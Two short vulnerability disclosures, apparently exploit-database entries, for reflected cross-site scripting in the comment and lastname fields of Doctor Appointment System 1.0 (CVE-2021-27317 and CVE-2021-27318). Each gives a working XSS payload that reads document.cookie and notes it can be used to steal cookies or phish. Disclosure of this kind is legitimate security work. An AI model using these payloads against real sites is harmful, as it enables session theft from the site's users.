# Exploit Title: Doctor Appointment System 1.0 - Reflected POST based Cross Site Scripting (XSS) in comment parameter # Date: 26-02-2021 # CVE: CVE-2021-27317 # Exploit Author: Soham Bakore # Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Version: V1.0 Vulnerable File: ---------------- http://host/doctorappointment/contactus.php <http://host/patient/search_result.php> Vulnerable Issue: ----------------- comment parameter has no input validation POC: ---- 1] Navigate to http://host/doctorappointment/contactus.php 2] In the comment parameter enter following payload to execute arbitrary javascript code : '</script><svg/onload=alert(document.cookie)> 3] This can be used to steal cookies or perform phishing attacks on the web application ------------------ # Exploit Title: Doctor Appointment System 1.0 - Reflected POST based Cross Site Scripting (XSS) in lastname parameter # Date: 26-02-2021 # CVE: CVE-2021-27318 # Exploit Author: Soham Bakore # Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Version: V1.0 Vulnerable File: ---------------- http://host/doctorappointment/contactus.php <http://host/patient/search_result.php> Vulnerable Issue: ----------------- lastname parameter has no input validation POC: ---- 1] Navigate to http://host/doctorappointment/contactus.php 2] In the lastname parameter enter following payload to execute arbitrary javascript code : '</script><svg/onload=alert(document.cookie)> 3] This can be used to steal cookies or perform phishing attacks on the web application